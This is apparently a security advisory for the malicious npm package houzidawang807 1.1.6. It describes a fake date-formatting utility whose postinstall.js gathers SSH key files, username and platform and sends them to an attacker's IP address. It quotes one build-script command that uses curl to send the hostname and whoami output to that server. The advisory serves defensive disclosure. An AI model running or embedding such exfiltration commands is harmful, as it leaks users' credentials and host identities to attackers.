VYPR
← All malware advisories

npm · Malicious package advisory

Malware

houzidawang807

MAL-2026-5731

Malicious code in houzidawang807 (npm)

Details


---
_-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (7568d90e7a8d940b5618fa36bccfc2b7fa02ceaa814f0a416d2cc989c685e489)
Package advertises itself as 'a simple date formatting utility' but ships an SSH-key-stealing C2 client. postinstall.js enumerates ~/.ssh for *.pub files, collects the installer's username and platform, and POSTs a JSON payload over HTTPS to the hardcoded bare IP 124.221.154.135. Source comments explicitly label this destination as the attacker's C2 server. package.json additionally declares a `build` script that curls http://124.221.154.135/pre?h=$(hostname)&u=$(whoami), leaking host identifiers in plaintext to the same C2. The legitimate-looking surface is a 3-line formatDate wrapper in index.js; the rest of the package is attack tooling. Although the malicious file is named postinstall.js, it is not currently wired into a lifecycle hook (scripts only declares `build`), so default `npm install` does not auto-execute it — however, the file is loaded by any consumer that requires the package or invokes the build script, and the file's name strongly suggests the author intends to enable it as a lifecycle hook in a follow-up version.

Compromised versions (1)

  • 1.1.6

Any computer that installed or ran a compromised version should be considered fully compromised. Rotate every secret on that machine from a clean environment.